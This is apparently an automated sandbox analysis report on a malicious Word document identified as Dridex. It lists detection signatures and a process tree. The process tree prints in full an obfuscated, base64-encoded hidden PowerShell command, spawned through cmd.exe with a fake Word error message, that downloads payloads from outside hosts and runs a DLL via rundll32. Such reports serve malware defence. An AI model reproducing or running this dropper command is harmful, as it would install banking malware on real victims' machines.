Loading ...

Play interactive tourEdit tour

Analysis Report Order.802796810.doc

Overview

General Information

Sample Name:Order.802796810.doc
Analysis ID:339433
MD5:b1c2a32cb28d07acc8b2d65ab2012db8
SHA1:3ac3123decd86944a576227554edbcbb3d62aa58
SHA256:6951461b231a0f4f2ee086768d3e5e79b30dd68efd55da80997d73c160e6ddce

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1068 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 952 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACgAJwAvAGMAagBzACcAKwAnAG8AJwApACsAKAAnAG0AbABvACcAKwAnAC4AegBpAHAAQAAnACkAKwAoACcAQQAnACsAJwBdAFsAcQAnACkAKwAnAFsAJwArACgAJwBEADoALwAnACsAJwAvACcAKQArACcAZQAtACcAKwAoACcAbQBhAGMAbwAnACsAJwBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC4AJwApACsAKAAnAGIAJwArACcAcgAvAGMAbAAzACcAKQArACcANQAnACsAKAAnAGUAMAAuAHoAaQBwACcAKwAnAEAAQQAnACsAJwBdAFsAJwApACsAJwBxAFsAJwArACgAJwBEACcAKwAnADoALwAnACkAKwAnAC8AbAAnACsAKAAnAGUAZwAnACsAJwBpACcAKwAnAG8AbgAuAHMAJwArACcAZQByACcAKwAnAGkAZQBzAG4AJwApACsAJwBvAHcAJwArACgAJwAuAHcAZQAnACsAJwBiACcAKQArACgAJwBzAGkAdAAnACsAJwBlACcAKQArACcALwBxACcAKwAoACcAMwAnACsAJwAzAHIAdgAnACkAKwAnADIAJwArACgAJwAuAHoAaQAnACsAJwBwACcAKQApAC4AIgByAGUAYABwAGwAYABBAEMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAJwArACcAZQB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAGkAdAAiACgAJABLADEANwBQACAAKwAgACQAUgB6AGUAOABtAHMAMQAgACsAIAAkAEoAMgA0AEwAKQA7ACQAUAA4ADkASgA9ACgAJwBHADIAJwArACcANQBQACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBoAGIAcgBjAGYAXwAgAGkAbgAgACQARwB0ADAAZQBzADEAdQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAdABlAG0ALgBuAEUAdAAuAHcARQBiAEMAbABpAEUATgBUACkALgAiAEQATwB3AGAATgBMAE8AQQBEAGYAaQBgAEwAZQAiACgAJABHAGgAYgByAGMAZgBfACwAIAAkAFUAbwA3AG8AbAB1AGUAKQA7ACQASwAxADgASwA9ACgAJwBKACcAKwAoACcANQBfACcAKwAnAFoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBvADcAbwBsAHUAZQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQANgAwADkANQApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABVAG8ANwBvAGwAdQBlACwAKAAoACcAUgAnACsAJwB1AG4ARAAnACkAKwAnAGwAbAAnACkALgAiAFQAYABPAHMAVAByAGkAYABOAGcAIgAoACkAOwAkAFoANgAyAEgAPQAoACgAJwBCACcAKwAnADcAOAAnACkAKwAnAFcAJwApADsAYgByAGUAYQBrADsAJABYADAANABMAD0AKAAoACcARQAnACsAJwAyADQAJwApACsAJwBBACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA1ADEAUwA9ACgAJwBJACcAKwAoACcAMwAnACsAJwA5AE0AJwApACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2384 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2520 cmdline: powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACgAJwAvAGMAagBzACcAKwAnAG8AJwApACsAKAAnAG0AbABvACcAKwAnAC4AegBpAHAAQAAnACkAKwAoACcAQQAnACsAJwBdAFsAcQAnACkAKwAnAFsAJwArACgAJwBEADoALwAnACsAJwAvACcAKQArACcAZQAtACcAKwAoACcAbQBhAGMAbwAnACsAJwBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC4AJwApACsAKAAnAGIAJwArACcAcgAvAGMAbAAzACcAKQArACcANQAnACsAKAAnAGUAMAAuAHoAaQBwACcAKwAnAEAAQQAnACsAJwBdAFsAJwApACsAJwBxAFsAJwArACgAJwBEACcAKwAnADoALwAnACkAKwAnAC8AbAAnACsAKAAnAGUAZwAnACsAJwBpACcAKwAnAG8AbgAuAHMAJwArACcAZQByACcAKwAnAGkAZQBzAG4AJwApACsAJwBvAHcAJwArACgAJwAuAHcAZQAnACsAJwBiACcAKQArACgAJwBzAGkAdAAnACsAJwBlACcAKQArACcALwBxACcAKwAoACcAMwAnACsAJwAzAHIAdgAnACkAKwAnADIAJwArACgAJwAuAHoAaQAnACsAJwBwACcAKQApAC4AIgByAGUAYABwAGwAYABBAEMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAJwArACcAZQB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAGkAdAAiACgAJABLADEANwBQACAAKwAgACQAUgB6AGUAOABtAHMAMQAgACsAIAAkAEoAMgA0AEwAKQA7ACQAUAA4ADkASgA9ACgAJwBHADIAJwArACcANQBQACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBoAGIAcgBjAGYAXwAgAGkAbgAgACQARwB0ADAAZQBzADEAdQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAdABlAG0ALgBuAEUAdAAuAHcARQBiAEMAbABpAEUATgBUACkALgAiAEQATwB3AGAATgBMAE8AQQBEAGYAaQBgAEwAZQAiACgAJABHAGgAYgByAGMAZgBfACwAIAAkAFUAbwA3AG8AbAB1AGUAKQA7ACQASwAxADgASwA9ACgAJwBKACcAKwAoACcANQBfACcAKwAnAFoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBvADcAbwBsAHUAZQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQANgAwADkANQApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABVAG8ANwBvAGwAdQBlACwAKAAoACcAUgAnACsAJwB1AG4ARAAnACkAKwAnAGwAbAAnACkALgAiAFQAYABPAHMAVAByAGkAYABOAGcAIgAoACkAOwAkAFoANgAyAEgAPQAoACgAJwBCACcAKwAnADcAOAAnACkAKwAnAFcAJwApADsAYgByAGUAYQBrADsAJABYADAANABMAD0AKAAoACcARQAnACsAJwAyADQAJwApACsAJwBBACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA1ADEAUwA9ACgAJwBJACcAKwAoACcAMwAnACsAJwA5AE0AJwApACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2532 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2556 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 52270", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAK

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection: